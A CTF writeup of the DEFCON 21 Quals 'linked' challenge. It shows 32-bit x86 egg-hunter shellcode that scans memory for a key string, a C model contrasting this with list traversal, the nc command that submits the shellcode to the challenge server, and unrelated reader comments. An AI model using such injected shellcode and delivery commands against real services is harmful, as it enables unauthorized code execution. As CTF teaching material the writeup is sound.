DEFCON 21 CTF Quals `linked` writeup

linked was a shellcoding challenge worth 3 points at DEFCON 21 CTF Quals

http://assets.shallweplayaga.me/linked.txt
Running at linked.shallweplayaga.me:22222 OR linked2.shallweplayaga.me:22222

linked.txt:

typedef struct _llist {
  struct _llist *next;
  uint32_t tag;
  char data[100];
} llist;

and:

register char *answer;
char *(*func)();
llist *head;
...
func = (char *(*)(llist *))userBuf;
answer = (char *)(*func)(head);
send_string(answer);
exit(0);

Write me shellcode that traverses the randomly generated linked list, looking for a node with a tag 0x41414100, and returns a pointer to the data associated with that tag, such that the call to send_string will output the answer.

Tests showed that linked was running on x86 – and by tests I mean “\xeb\xfe” :P. After trying to write and optimize shellcode for doing the job, I thought of an easier attack vector. Instead of writing the shellcode to find the node with the given tag, I thought of scanning memory in order to find the key directly (since all keys start with “The key is:”), much like an egg hunter. The shellcode turned out to be a whole lot shorter than the limit (a whole 2 bytes :).

Code:

bits 32

pop edx              ; return address pushed by the call through func
pop eax              ; first argument: head of the list
mov ebx, 'The '      ; egg: first 4 bytes of every key, little-endian

_loop:
    inc eax          ; advance one byte (the head itself is never checked)
    cmp [eax], ebx   ; does memory here start with "The "?
    jnz _loop

jmp edx              ; "return" with eax -> key; stack is left 8 bytes off

; yep, i can afford nops
nop
nop
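
To make the two approaches concrete side by side, here is an added C model of the challenge (not the service's code and not the writeup's shellcode): it builds a constructed list with the node layout from linked.txt, implements the tag-walk the task asked for, and implements the byte-scan the shellcode above performs. It assumes the nodes sit in one contiguous arena above the head, which is what makes the scan work.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Same node layout as linked.txt. */
typedef struct _llist {
    struct _llist *next;
    uint32_t tag;
    char data[100];
} llist;

#define TARGET_TAG 0x41414100u
#define NNODES 8

/* Constructed stand-in for the service's randomly built list; the real
   tags and key are not reproduced. A static array keeps the nodes
   contiguous, so a forward scan from head passes over all of them. */
static llist nodes[NNODES];

llist *build_list(void) {
    for (int i = 0; i < NNODES; i++) {
        nodes[i].next = (i + 1 < NNODES) ? &nodes[i + 1] : NULL;
        nodes[i].tag = 0x10000000u + (uint32_t)i;   /* filler tags */
        snprintf(nodes[i].data, sizeof nodes[i].data, "junk %d", i);
    }
    nodes[5].tag = TARGET_TAG;                       /* the wanted node */
    strcpy(nodes[5].data, "The key is: CONSTRUCTED_PLACEHOLDER");
    return &nodes[0];
}

/* What the challenge asked for: follow next until the tag matches. */
char *find_by_tag(llist *head) {
    for (llist *n = head; n != NULL; n = n->next)
        if (n->tag == TARGET_TAG)
            return n->data;
    return NULL;
}

/* What the shellcode does instead: ignore the links and scan forward
   from head one byte at a time until "The " appears (inc eax first). */
char *find_by_egg(llist *head, size_t limit) {
    uint32_t egg, v;
    memcpy(&egg, "The ", 4);   /* same value as mov ebx, 'The ' */
    char *p = (char *)head;
    for (size_t i = 1; i + 4 <= limit; i++) {
        memcpy(&v, p + i, 4);  /* unaligned read, like cmp [eax], ebx */
        if (v == egg) return p + i;
    }
    return NULL;
}
```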

See it in action:

x-n2o@istari:~$ nasm linked.asm -o linked
x-n2o@istari:~$ nc linked.shallweplayaga.me 22222 < linked
List built.  Send me your shellcode.  Max size: 16
The key is: Who says ESP isn't general purpose!?!?

~ X-N2O


3 Responses to “DEFCON 21 CTF Quals `linked` writeup”

  1. greg says:

    hah, that was a pretty nice solution! I took the manual route and wrote the 16 byte shellcode to traverse the linked list. way to think outside the box!

  2. Menno says:

    Your tutorials and guides have been of great use to me and I really appreciate it. I had some questions though concerning the use of some of your source code examples. Would it be possible for me to send you a private message?

  3. MT says:

    Hi,
    I am trying to compile your Twofish code seen on
    http://www.rohitab.com/discuss/topic/36074-c-twofish/
    to no avail as it is missing “twofish_init” and a bunch of other
    stuff which most likely would be found in “twofish.h”.
    May I receive the above two files via email please?

    Thanks a lot
